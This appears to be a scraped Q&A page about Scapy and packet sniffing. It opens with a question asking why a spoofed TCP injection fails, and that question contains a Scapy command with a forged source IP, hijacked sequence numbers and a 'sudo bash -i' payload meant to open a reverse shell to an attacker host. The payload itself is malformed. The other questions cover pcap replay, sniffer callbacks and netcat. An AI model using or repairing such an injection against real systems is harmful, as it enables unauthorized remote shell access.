I am learning on how to do reverse shell using scapy by using spoofed IP address(legitimate host) and mac address.
I am using this command :
send(IP(src="192.168.0.114",dst="192.168.0.113")/TCP(sport=54484,dport=23,seq=2034533561,ack=1565253469)/ Raw(load="sudo bash -i > /home/192.168.0.112/9090”))
I can see in wireshark that the server(192.168.0.113) accepted the packet, but never trigger the reverse shell connection to the attacker (192.168.0.112)
What am I doing wrong here ? Still quite new in using scapy.
Thanks in advance.
I think your server should extract the data from the packet, after that transfers the data to be readable text which could be running on the server shell.
Related
my task is as follows: collect some information about application-level network requests (for example, in .pcap file) and repeat these requests on another computer running python 3.6. For example, I have a pcap file with an http request to some site, I want to repeat it on another computer using some python lib, is there a way to do this? I am interested in HTTP, HTTPS, FTP, DNS, IMAP, SSH protocols. Thanks in advance.
You can use TCPReply for replying a .pcap file.
Just sniff your data with wireshark on one computer, save it to .pcap file., and you can play it later using the TCPReply tool.
I use Wireshark to capture the traffic for browsing a certain website and use ip.src and ip.dst to get correct traffic.
I'd like to do this programmatically using Scapy. Anyone know how to achieve this?
Using Scapy and its wonderful documentation, create a Python script. In the script, define a function that will act as a callback handler for received packets and in the main portion of the script make use of the sniff() function:
def packetReceived(packet):
print("Packet received!")
sniff(filter="host xx.xx.xx.xx and host xx.xx.xx.xx and tcp port 80", prn=packetReceived)
Obviously, change the BPF filter to match the hosts you're targeting.
I would like to create a demo with the following topology:
... --->[switch] <---> [Host]
DEMO: A switch sends a packet to a monitoring Host (The packets original destination is not this Host, yet switch will send to it via a mirror port). The monitor-Host is to capture that packet, do something with it (e.g., just dump the L2-L4 header fields into some log file), and then send the original packet back towards the switch.
Host Environment: Ubuntu 12.04 Linux.
Dilemma: What's the simplest way I can capture the packet in Host and send back the original packet to the switch?
Possibilities to Explore:
Create a packet sniffer program in C (looks complex ... libpcap, AF_Packet sockets etc.).
Try to use python scapy (don't know how complex this will be).
Try to install some open source proxy server of some kind to which I can write a plugin that will examine the captured packets.
Question: Any better recommendations (if I can avoid going the programming route, it would be preferred. Is there any simple scripting method to do this?). Looking for a quick-and-dirty method here. Thanks.
well, you can use packets sniffers available such as wireshark, ettercap which will capture all network packets (using promisc mode) and dump them in readable format.
Or, you can preety much easily code sniffer for yourself in python, linux which is not so much complex to understand..
i have to send byte array using TCP/IP in Linux. Which program should i use? I couldn't use netcat because program gives me an error about authorization. I can send data through telnet but i can't use telnet to send raw data.
You can use netcat to send raw data. If it's giving you an error about authorization any other alternatives will probably do the same; I'm guessing the error comes from the host you're trying to connect to.
Please try to post more information (the actual error) and the options you're passing to netcat.
I need to write a packet sniffer in Linux that detects HTTPS packet that are sent and save the url from the request. I found code for this in security-freak and ran it. This code runs and only sniffs the received packet but I need to get the sent packet in the sniffer.
How do I get the sent packet in this code?
I can't use any library like libcap (forbidden).
The code is :sniffer.c
You should be using ETH_P_ALL instead of ETH_P_IP as the protocol. ETH_P_IP only listens for incoming IP packets.
Why can't you use any library? Homework?
It's hard to answer without having examples from your code, for example how you set sll_pkttype.
The urlsnarf tool in the dnsiff suite could be worth a look.
With appropriate libpcap or DNET usage You should be able to get all network
traffic on the desired layer (protocol - 5) (also this outgoing).
But You should know that already.
You need to go through the above libraries manuals and find the appropriate filtering.